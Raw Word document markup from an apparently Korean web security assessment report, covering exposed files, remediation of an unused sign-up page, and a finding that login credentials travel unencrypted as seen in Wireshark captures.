    <w:p w14:paraId="228A1CDB" w14:textId="77777777" w:rsidR="00E22378" w:rsidRDefault="00E22378" w:rsidP="00E22378">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B011B9" w14:textId="78063E1F" w:rsidR="00E22378" w:rsidRDefault="00E22378" w:rsidP="00E22378">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05CAED99" wp14:editId="73AA6C2B">
            <wp:extent cx="4571752" cy="3034392"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="13970"/>
            <wp:docPr id="1293467103" name="그림 12934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0998"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="30345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167F5B" w14:textId="398D0597" w:rsidR="00E22378" w:rsidRPr="00E22378" w:rsidRDefault="00E22378" w:rsidP="00E22378">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="460" w:name="_Toc209094658"/>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85</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s/npm.js </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일</w:t>
      </w:r>
      <w:bookmarkEnd w:id="460"/>
    </w:p>
    <w:p w14:paraId="60E1DD91" w14:textId="34588CD0" w:rsidR="00E143AC" w:rsidRDefault="00250FDC" w:rsidP="00E143AC">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F552ECF" wp14:editId="6C04B0E5">
            <wp:extent cx="3581400" cy="4756654"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="25400"/>
            <wp:docPr id="1293467101" name="그림 129346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1656" b="7502"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3581897" cy="4757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034C7C" w14:textId="3022AA8A" w:rsidR="00001921" w:rsidRDefault="00E143AC" w:rsidP="00E143AC">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="461" w:name="_Toc209094659"/>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86</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C858F0">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C858F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00C858F0">
        <w:t>keditor/README.md</w:t>
      </w:r>
      <w:r w:rsidR="00BF31CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF31CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일</w:t>
      </w:r>
      <w:bookmarkEnd w:id="461"/>
    </w:p>
    <w:p w14:paraId="2E00AFE4" w14:textId="627E78E0" w:rsidR="005A2436" w:rsidRDefault="005A2436" w:rsidP="00DA1F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AFD238D" w14:textId="77777777" w:rsidR="00933CCF" w:rsidRPr="00CB22A6" w:rsidRDefault="00933CCF" w:rsidP="00933CCF">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933CCF" w:rsidRPr="00CB22A6" w14:paraId="398077AD" w14:textId="77777777" w:rsidTr="003C63D0">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="110341AD"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44FB49E9"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74F5518"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33CCF" w:rsidRPr="00CB22A6" w14:paraId="5338DF94"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07BE85D" w14:textId="77777777" w:rsidR="00933CCF" w:rsidRPr="00CB22A6" w:rsidRDefault="00933CCF" w:rsidP="003C63D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8DFA51" w14:textId="77777777" w:rsidR="00933CCF" w:rsidRPr="00CB22A6"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DC90104" w14:textId="64509688" w:rsidR="00933CCF" w:rsidRPr="00CB22A6"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/ckeditor/README.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00933CCF" w:rsidRPr="00987A57" w14:paraId="6FDC7867"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7E6049C" w14:textId="77777777" w:rsidR="00933CCF" w:rsidRPr="00CB22A6" w:rsidRDefault="00933CCF" w:rsidP="003C63D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4BB853"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9EB3853" w14:textId="02ABCB75" w:rsidR="00933CCF" w:rsidRPr="00987A57"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/File.jsp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00933CCF" w:rsidRPr="00181412" w14:paraId="56F82108"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80406B8" w14:textId="77777777" w:rsidR="00933CCF" w:rsidRPr="00CB22A6" w:rsidRDefault="00933CCF"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82B20F"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9F5D4F9" w14:textId="13A8F823" w:rsidR="00933CCF"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/findId.jsp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00933CCF" w:rsidRPr="00181412" w14:paraId="75DDC66E"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818222D" w14:textId="77777777" w:rsidR="00933CCF" w:rsidRDefault="00933CCF"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E3CBE7"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E120F31" w14:textId="544405C5" w:rsidR="00933CCF"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/joinForm.jsp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00805550" w:rsidRPr="00181412" w14:paraId="21949397"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54D39F6" w14:textId="5BEEBE07" w:rsidR="00805550" w:rsidRDefault="00805550"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57F3D" w14:textId="7DFB93A2" w:rsidR="00805550" w:rsidRDefault="00805550"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3DF1E28" w14:textId="509E4A1B" w:rsidR="00805550"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/js/npm.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CBB24C5" w14:textId="77777777" w:rsidR="00933CCF" w:rsidRDefault="00933CCF" w:rsidP="001D4492">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:leftChars="0" w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="145310DE" w14:textId="77777777" w:rsidR="00DA1F20" w:rsidRPr="00CB22A6" w:rsidRDefault="00DA1F20" w:rsidP="00DA1F20">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E73AE6F" w14:textId="0A12E631" w:rsidR="00343769" w:rsidRDefault="00582120" w:rsidP="003C0A73">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00582120">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용되지</w:t>
      </w:r>
      <w:r w:rsidRPr="00582120">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 않는 회원가입 페이지는 삭제하거나 인증 및 접근 제한을 적용해야 하며, 모든 입력값에 대해 서버 측 유효성 검증을 수행해야 합니다. 아이디 중복 검사와 비밀번호 정책을 강제하여 동일한 계정 정보로의 재등록 및 기존 계정 무력화가 발생하지 않도록 계정 생성 로직을 개선해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F79DC8" w14:textId="70B95D68" w:rsidR="00343769" w:rsidRDefault="00343769" w:rsidP="00343769">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="462" w:name="_Toc209094571"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>데이터 평문 전송</w:t>
      </w:r>
      <w:bookmarkEnd w:id="462"/>
    </w:p>
    <w:p w14:paraId="746CEA1A" w14:textId="77777777" w:rsidR="00343769" w:rsidRDefault="00343769" w:rsidP="00343769">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115DEF98" w14:textId="0FA2DAAD" w:rsidR="00343769" w:rsidRPr="00E97C32" w:rsidRDefault="00DA767C" w:rsidP="00DA767C">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹상의</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 데이터 통신은 대부분 텍스트 기반으로 이루어지기 때문에 서버와 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클라이언트</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 간에 암호화 프로세스를 구현</w:t>
      </w:r>
      <w:r w:rsidR="00D019A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해야 합니다.</w:t>
      </w:r>
      <w:r w:rsidR="00D019A0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D019A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>구현하지 않았다면 공격자의</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 간단한 도청(Sniffing)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 통해 정보를 탈취 및 도용</w:t>
      </w:r>
      <w:r w:rsidR="00E97C32">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>할 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBD4F57" w14:textId="77777777" w:rsidR="00343769" w:rsidRDefault="00343769" w:rsidP="00343769">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0899B47F" w14:textId="77777777" w:rsidR="00343769" w:rsidRPr="00CB22A6" w:rsidRDefault="00343769" w:rsidP="00343769">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF2C92E" w14:textId="77777777" w:rsidR="0061347E" w:rsidRDefault="00E45C2E" w:rsidP="0061347E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>도구를 사용하여 패킷을 잡은 결과</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그인할 때 사용자의 아이디와 비밀번호가 암호화되지 않고 서버 측으로 넘어가는 것을 확인하였습니다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0070333E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>현재 상태는 간단한 도청만으로도 사용자의</w:t>
      </w:r>
      <w:r w:rsidR="0070333E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0070333E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>아이디와 비밀번호가 노출될 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4898091E" w14:textId="77777777" w:rsidR="0061347E" w:rsidRDefault="0061347E" w:rsidP="0061347E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007698A5" w14:textId="761CC3FF" w:rsidR="0061347E" w:rsidRPr="0061347E" w:rsidRDefault="0061347E" w:rsidP="0061347E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20906D2B" wp14:editId="0B032406">
            <wp:extent cx="4571365" cy="2450868"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="2603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557" b="46784"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="24512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161D5" w14:textId="3FF72D51" w:rsidR="00837FA4" w:rsidRDefault="0061347E" w:rsidP="00837FA4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="463" w:name="_Toc209094660"/>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87</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00453EC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00453EC8">
        <w:t>ireshark</w:t>
      </w:r>
      <w:r w:rsidR="00453EC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>현재 연결 중인 네트워크 선택</w:t>
      </w:r>
      <w:bookmarkEnd w:id="463"/>
    </w:p>
    <w:p w14:paraId="21F02F4C" w14:textId="77777777" w:rsidR="00837FA4" w:rsidRDefault="00837FA4" w:rsidP="00837FA4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="501BDCF8" w14:textId="0923152E" w:rsidR="00837FA4" w:rsidRPr="00837FA4" w:rsidRDefault="00837FA4" w:rsidP="00837FA4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03947C70" wp14:editId="1289C423">
            <wp:extent cx="4572000" cy="2343613"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="190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643" t="9877" b="57151"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="23436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C8136" w14:textId="5B435721" w:rsidR="00D10C6D" w:rsidRDefault="00837FA4" w:rsidP="00D10C6D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="464" w:name="_Toc209094661"/>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88</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>ireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에서 패킷 캡처 준비 중</w:t>
      </w:r>
      <w:bookmarkEnd w:id="464"/>
    </w:p>
    <w:p w14:paraId="0522ECC3" w14:textId="77777777" w:rsidR="00D10C6D" w:rsidRDefault="00D10C6D" w:rsidP="00D10C6D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0346D978" w14:textId="4815BDE6" w:rsidR="00D10C6D" w:rsidRDefault="00D10C6D" w:rsidP="00D10C6D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79CD5B47" wp14:editId="4A3630E8">
            <wp:extent cx="4572000" cy="2325615"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="177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893" t="45711" r="31313" b="33130"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="23256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E44D88" w14:textId="0730E1E5" w:rsidR="00E00A39" w:rsidRDefault="00D10C6D" w:rsidP="00E00A39">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="465" w:name="_Toc209094662"/>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89</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>계정 로그인 시도</w:t>
      </w:r>
      <w:bookmarkEnd w:id="465"/>
    </w:p>
    <w:p w14:paraId="1D99CB59" w14:textId="77777777" w:rsidR="00E00A39" w:rsidRDefault="00E00A39" w:rsidP="00E00A39">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D2B8A2" w14:textId="0F77D69C" w:rsidR="00E00A39" w:rsidRDefault="00EA7A45" w:rsidP="00E00A39">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251891712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0370E5EF" wp14:editId="1BFF04FB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2143760</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>133985</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1574800" cy="514350"/>
                <wp:effectExtent l="38100" t="0" r="25400" b="76200"/>
                <wp:wrapNone/>
                <wp:docPr id="44" name="직선 화살표 연결선 44"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="1574800" cy="514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B9CB9" id="직선 화살표 연결선 44" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:168.8pt;margin-top:10.55pt;width:124pt;height:40.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RFqIAIAAFEEAAAOAAAAZHJzL2Uyb0RvYy54bWysVM2O0zAQviPxDpbvNOnSwlI13UOXwgFB&#10;xcIDuI6dWHJsa2ya9gjiBZCQEBIHblxXK54Kdd+BsZOGXyGByMHK2PN9M9/nSeZnu0aTrQCvrCno&#10;eJRTIgy3pTJVQZ8/W906pcQHZkqmrREF3QtPzxY3b8xbNxMntra6FECQxPhZ6wpah+BmWeZ5LRrm&#10;R9YJg4fSQsMChlBlJbAW2RudneT5nay1UDqwXHiPu+fdIV0kfikFD0+k9CIQXVDsLaQV0rqJa7aY&#10;s1kFzNWK922wf+iiYcpg0YHqnAVGXoD6hapRHKy3Moy4bTIrpeIiaUA14/wnNRc1cyJpQXO8G2zy&#10;/4+WP96ugaiyoJMJJYY1eEeHTy8Prz+S6/dvD68+X7/5QA7vLr9cXcY9TELHWudnCFyaNfSRd2uI&#10;8ncSGiK1cg9xGJIhKJHskt/7wW+xC4Tj5nh6d3Ka47VwPJuOJ7en6UKyjifyOfDhgbANiS8F9QGY&#10;quqwtMbg1VroarDtIx+wEwQeARGsDWmxyL0caWPsrVblSmmdAqg2Sw1ky3AyVqscnygNKX5IC0zp&#10;+6YkYe/QmQCKmUqLPlMbBEQzOvnpLey16Io/FRKNjTK76nGkxVCScS5MGA9MmB1hEtsbgH3bfwL2&#10;+REq0rj/DXhApMrWhAHcKGPhd22H3bFl2eUfHeh0Rws2ttynwUjW4NwmV/tvLH4Y38cJ/u1PsPgK&#10;AAD//wMAUEsDBBQABgAIAAAAIQBLGwpc3QAAAAoBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMw&#10;DIbvSLxDZCRuLG3HxihNJzSBxnVjD5A1pq2aOKVJ1+7tMSc42v70+/uL7eysuOAQWk8K0kUCAqny&#10;pqVawenz/WEDIkRNRltPqOCKAbbl7U2hc+MnOuDlGGvBIRRyraCJsc+lDFWDToeF75H49uUHpyOP&#10;Qy3NoCcOd1ZmSbKWTrfEHxrd467BqjuOTkG135tu7qfTdzc+2oN8uz6nHzul7u/m1xcQEef4B8Ov&#10;PqtDyU5nP5IJwipYLp/WjCrI0hQEA6vNihdnJpMsBVkW8n+F8gcAAP//AwBQSwECLQAUAAYACAAA&#10;ACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIt&#10;ABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQIt&#10;ABQABgAIAAAAIQDO5RFqIAIAAFEEAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBL&#10;AQItABQABgAIAAAAIQBLGwpc3QAAAAoBAAAPAAAAAAAAAAAAAAAAAHoEAABkcnMvZG93bnJldi54&#10;bWxQSwUGAAAAAAQABADzAAAAhAUAAAAA&#10;" strokecolor="red" strokeweight="1.5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0006118B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251886592" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="670B4A72" wp14:editId="216EDCB7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3229610</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>13335</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1009650" cy="107950"/>
                <wp:effectExtent l="0" t="0" r="19050" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="43" name="직사각형 43"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="10096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FEC08" id="직사각형 43" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:254.3pt;margin-top:1.05pt;width:79.5pt;height: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AHsAIAAJQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1u2zAMvg/YOwi6r7aztF2MOkXQIsOA&#10;oi3WDj0rshwbkEVNUv52695hwN5glx32XEP3DqMk2w26YodhOTikSH4UP5E8Od22kqyFsQ2ogmYH&#10;KSVCcSgbtSzoh9v5qzeUWMdUySQoUdCdsPR0+vLFyUbnYgQ1yFIYgiDK5htd0No5nSeJ5bVomT0A&#10;LRQaKzAtc6iaZVIatkH0ViajND1KNmBKbYALa/H0PBrpNOBXleDuqqqscEQWFO/mwteE78J/k+kJ&#10;y5eG6brh3TXYP9yiZY3CpAPUOXOMrEzzB1TbcAMWKnfAoU2gqhouQg1YTZY+qeamZlqEWpAcqwea&#10;7P+D5Zfra0OasqDj15Qo1uIbPXy7f/j8/eeP+19fvxA8Ro422uboeqOvTadZFH3B28q0/h9LIdvA&#10;627gVWwd4XiYpenk6BDp52jL0uMJygiTPEZrY91bAS3xQkENvlugk60vrIuuvYtPpmDeSInnLJeK&#10;bBB0kiKm1y3IpvTWoJjl4kwasmb4/PN5ir8u8Z4bXkMqvI2vMVYVJLeTIiZ4LypkCOsYxQy+N8UA&#10;yzgXymXRVLNSxGyH+8n6iFCzVAjokSu85YDdAfSeEaTHjgx0/j5UhNYegrvS/xY8RITMoNwQ3DYK&#10;zHOVSayqyxz9e5IiNZ6lBZQ77B8DcbCs5vMGX/CCWXfNDE4SPjpuB3eFn0oCvhR0EiU1mE/PnXt/&#10;bHC0UrLBySyo/bhiRlAi3yls/Uk2HvtRDsr48HiEitm3LPYtatWeAb5+hntI8yB6fyd7sTLQ3uES&#10;mfmsaGKKY+6Ccmd65czFjYFriIvZLLjh+GrmLtSN5h7cs+o79HZ7x4zu2tjhAFxCP8Usf9LN0ddH&#10;KpitHFRNaPVHXju+cfRD43Rryu+WfT14PS7T6W8AAAD//wMAUEsDBBQABgAIAAAAIQBqNXbE3AAA&#10;AAgBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT4QwEIXvJv6HZky8uYUmAiJloybGaDzoqvcuzALZ&#10;dkpoF/DfO570+PK+vPmm2q7OihmnMHjSkG4SEEiNbwfqNHx+PF4VIEI01BrrCTV8Y4BtfX5WmbL1&#10;C73jvIud4BEKpdHQxziWUoamR2fCxo9I3B385EzkOHWynczC485KlSSZdGYgvtCbER96bI67k9Pw&#10;5o8Hab+Uesnvn1T+7Iqlm1+1vrxY725BRFzjHwy/+qwONTvt/YnaIKyG66TIGNWgUhDcZ1nOec/g&#10;TQqyruT/B+ofAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAG